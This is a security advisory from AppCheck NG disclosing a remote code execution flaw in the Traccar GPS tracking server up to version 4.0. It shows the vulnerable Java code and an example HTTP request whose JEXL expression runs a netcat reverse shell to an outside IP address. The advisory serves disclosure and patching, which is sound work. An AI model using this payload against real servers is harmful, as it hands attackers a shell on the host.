X CLOSE

Enter your email below to sign up for latest updates from Appcheck NG.

CLOSE

Simply complete the info below and we'll send you all you need to activate AppCheck NG and undertake your FREE scan.

Please enter individual IP addresses or ranges

Please enter full URLs for your web applications, and both http and https where appropriate

Advisory: Remote Code Execution Traccar Server <=4.0 (AC-2018-10-8-1)


Our security team discovered a Remote Code Execution (RCE) vulnerability in the GPS vehicle tracking system Traccar (version <= 4.0).  This allows an attacker to compromise the server’s host via a self-registered user account.

If you use Traccar server, please update to >= v4.1 as soon as possible.

Vulnerability Identification

Traccar

Traccar is a widely deployed Open Source GPS tracking system which supports over one thousand different devices/protocols.  The source tracking data is collected from devices by the server and is used to provide useful organisational services via a web portal, such as for logistics and efficient transportation worldwide.

Timeline

Vulnerability Details

A feature of the application allows a self-registered user to create expressions which effectively normalise the output of their tracking devices in order to improve integration with the application.

Examples are such as synthesising the engine state of vehicles where that data is lacking from the particular device by inferring it from the device’s battery charge state.

These expressions are interpreted by the third-party JexlEngine without adequate restriction from the Java Virtual Machine (JVM).  As such, a crafted JEXL script can allow an attacker to compromise the server.

Example Crafted Request

POST /traccar/api/attributes/computed/test?deviceId=1 HTTP/1.1
Host: foo.host.com
X-Requested-With: XMLHttpRequest
Content-Type: application/json
Cookie: JSESSIONID=...; ext-devices-...

{"id":-1,"description":"test","type":"string","attribute":"raw",
"expression":"''.class.class.forName('java.lang.Runtime')
.getRuntime().exec('nc -nv 1.2.3.4 443 -e /bin/bash')"}

Vulnerable Code

// src/org/traccar/processing/ComputedAttributesHandler.java
package org.traccar.processing;
...
import org.traccar.model.Position;

@ChannelHandler.Sharable
public class ComputedAttributesHandler extends BaseDataHandler {

    public ComputedAttributesHandler() {
        engine = new JexlEngine();
        engine.setStrict(true);
        ...
    }

    private MapContext prepareContext(Position position) {
        MapContext result = new MapContext();
        ...
        return result;
    }

    public Object computeAttribute(Attribute attribute, Position position) throws JexlException {
        return engine.createExpression(attribute.getExpression()).evaluate(prepareContext(position));
    }
    ...
}

PoC Exploitation

A proof-of-concept tool (traccar_exploit.v1.py) was was written to exploit this vulnerability and is demonstrated in this video

References